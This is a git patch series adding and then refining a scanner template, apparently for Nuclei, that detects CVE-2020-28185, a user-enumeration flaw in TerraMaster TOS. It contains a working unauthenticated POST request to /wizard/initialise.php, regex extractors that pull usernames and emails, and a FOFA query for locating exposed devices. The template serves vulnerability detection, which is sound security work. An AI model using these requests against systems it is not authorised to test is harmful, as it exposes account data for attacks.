From ec72aec7f628027a1336ebb02c96d8942aa9bef3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 8 Aug 2023 15:05:46 +0530 Subject: [PATCH 1/2] TerraMaster TOS - User Enumeration --- http/cves/2020/CVE-2020-28185.yaml | 56 ++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 http/cves/2020/CVE-2020-28185.yaml diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml new file mode 100644 index 0000000000..305c9a9c91 --- /dev/null +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -0,0 +1,56 @@ +id: CVE-2020-28185 + +info: + name: TerraMaster TOS < 4.2.06 - User Enumeration + author: pussycat0x + severity: medium + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md + - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + metadata: + max-request: 1 + verified: true + fofa-query: '"TerraMaster" && header="TOS"' + tags: tamronos,enum + +http: + - raw: + - | + GET /tos/index.php?user/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + - | + POST /wizard/initialise.php HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Referer: {{BaseURL}}/tos/index.php?user/login + + tab=checkuser&username=admin + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "username" + - "email" + - "status" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_2 + regex: + - '"username":"(.*?)"' + - '"email":"(.*?)"' \ No newline at end of file From d836e594adac616198aaae9f45abff792f45b490 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 9 Aug 2023 13:08:58 +0530 Subject: [PATCH 2/2] fix template --- http/cves/2020/CVE-2020-28185.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml index 305c9a9c91..fa96180314 100644 --- a/http/cves/2020/CVE-2020-28185.yaml +++ b/http/cves/2020/CVE-2020-28185.yaml @@ -4,24 +4,23 @@ info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium + description: | + User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 + - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ metadata: max-request: 1 verified: true fofa-query: '"TerraMaster" && header="TOS"' - tags: tamronos,enum + tags: cve,cve2020,tamronos,enum,tos http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - | POST /wizard/initialise.php HTTP/1.1 @@ -29,7 +28,7 @@ http: Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - Referer: {{BaseURL}}/tos/index.php?user/login + Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin @@ -53,4 +52,4 @@ http: part: body_2 regex: - '"username":"(.*?)"' - - '"email":"(.*?)"' \ No newline at end of file + - '"email":"(.*?)"'